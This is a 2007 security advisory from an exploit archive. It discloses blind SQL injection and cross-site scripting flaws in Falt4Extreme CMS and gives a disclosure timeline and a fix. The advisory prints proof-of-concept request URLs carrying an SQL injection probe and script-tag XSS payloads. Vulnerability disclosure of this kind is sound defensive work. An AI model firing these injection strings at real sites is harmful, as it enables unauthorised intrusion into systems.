477bcbdcc0
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
57 lines
2.5 KiB
Text
Executable file
57 lines
2.5 KiB
Text
Executable file
H - Security Labs
|
|
Falt4 CMS (RC4 10.9.2007) Security Report /Advisory
|
|
ID : HSEC#20071012
|
|
|
|
General Information
|
|
--------------------------
|
|
Name : Falt4Extreme CMS (RC4 10.9.2007)
|
|
Vendor HomePage :http://sourceforge.net/projects/falt4/
|
|
Platforms : PHP && MySQL
|
|
Vulnerability Type : Input Validation Errors
|
|
Disclosure Timeline
|
|
-------------------------
|
|
04 December 2007 -- Vendor Contacted
|
|
04 December 2007 -- Vendor Replied
|
|
05 December 2007 -- Fix Released
|
|
10 December 2007 -- Pulic Disclosure
|
|
|
|
What is Falt4Extreme
|
|
------------------------
|
|
Falt4 CMS is a business approved Content Management System (CMS) under the LGPL. The CMS is feature-rich and has a clean administration area. The ultimate CMS with functions for the professional, usable by everyone.CMS modules are available.
|
|
Overview of Vulnerabilities
|
|
------------------------
|
|
The script is vulnerable to both of XSS and Blind SQL Injection attacks.
|
|
Details of Vulnerabilities
|
|
------------------------
|
|
1-Blind SQL Injection Vulnerability:
|
|
http://www.EXAMPLE.com/falt4/
|
|
index.php?handler=cat&nav_ID=1'%20and%20'1'='1
|
|
nav_ID parameter is not sanitized properly and can be used for Blind SQL Injection attacks.
|
|
2-Cross Site Scripting Vulnerabilities
|
|
i.http://www.EXAMPLE.com/falt4/
|
|
index.php?handler=>"><script>alert(3)</script>&nav_ID=1
|
|
Input passed to the 'handler' parameter is not sanitized properly before using and can be used by malicious people to perform XSS attacks.
|
|
ii .http://www.EXAMPLE.com/falt4/
|
|
modules/feed/feed.php?type=rss&lang=1&topic=>"><script>alert(2)</script>
|
|
Input passed to the 'topic' parameter is not sanitized properly before using and can be used by malicious people to perform XSS attacks.
|
|
Solution
|
|
-----------------------
|
|
Re-download falt4 from sourceforge:
|
|
http://downloads.sourceforge.net/falt4/falt4extreme.zip?use_mirror=osdn
|
|
Replace these files:
|
|
/yourfalt4/index.php
|
|
/yourfalt4/modules/feed.php
|
|
/yourfalt4/admin/index.php
|
|
-----------------------
|
|
The vulnerabilities found on 04 December 2007
|
|
by Mesut Timur <mesut@h-labs.org>
|
|
H - Security Labs , http://www.h-labs.org
|
|
Gebze Institue of Technology, Computer Engineering, http://www.gyte.edu.tr
|
|
References
|
|
-----------------------
|
|
Vendor Confirmation : http://sourceforge.net/forum/forum.php?forum_id=762931
|
|
Original Advisory : http://www.h-labs.org/blog/2007/12/05/falt4_cms_security_report_advisory.html
|
|
http://sourceforge.net/projects/falt4/
|
|
http://www.h-labs.org
|
|
|
|
# milw0rm.com [2007-12-10]
|